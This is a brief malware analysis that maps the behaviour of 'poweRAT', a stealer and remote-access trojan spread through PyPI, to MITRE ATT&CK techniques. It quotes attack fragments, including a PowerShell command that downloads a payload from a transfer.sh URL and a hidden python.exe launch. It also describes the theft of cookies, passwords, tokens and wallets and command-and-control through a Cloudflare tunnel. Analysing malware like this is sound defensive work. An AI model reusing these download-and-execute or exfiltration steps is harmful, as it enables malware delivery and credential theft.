A Deep Dive Into poweRAT: a Newly Discovered Stealer/RAT Combo Polluting PyPI

MITRE Techniques

• [T1027] Obfuscated/Compressed Files and Information – The code uses an exec of a Base64-encoded string to hide payload execution. ‘The purpose of using exec on the encoded string appears to be an attempt to thwart static analysis and/or provide some minimal form of obfuscation.’
• [T1059.001] PowerShell – PowerShell is used to download and deploy the next stage and run the payload in hidden mode. ‘Start-Process -WindowStyle Hidden -FilePath python.exe -Wait -ArgumentList …’
• [T1105] Ingress Tool Transfer – The initial payload is retrieved from an external server. ‘Invoke-WebRequest -UseBasicParsing -Uri https://transfer.sh/0tUIJu/Updater.zip -OutFile $env:tmp/update.zip’
• [T1547.001] Boot or Logon Autostart Execution – Persistence achieved by placing an Updater shortcut in the Windows startup folder. ‘The first thing this code does is try to establish persistence by putting itself into the Windows startup folder with the benign sounding name Updater.’
• [T1113] Screen Capture – Remote desktop capability with a live view; described as ‘a rudimentary remote desktop implementation with about a 1fps refresh rate.’
• [T1056.001] Input Capture – Keystroke logging component is started. ‘This one is simple, it just starts a keystroke logger:’
• [T1041] Exfiltration – Data theft and exfiltration of cookies, browser passwords, tokens, and wallets, uploaded via transfer.sh. ‘st … cookies … exfiltrates it through another transfer.sh site.’
• [T1071.001] Web Protocols – C2 over HTTP/HTTPS via a Flask app exposed through a Cloudflare tunnel. ‘Cloudflare attracts client requests and sends them to you via this daemon’ and ‘a cloudflare tunnel client on the victim’s machine.’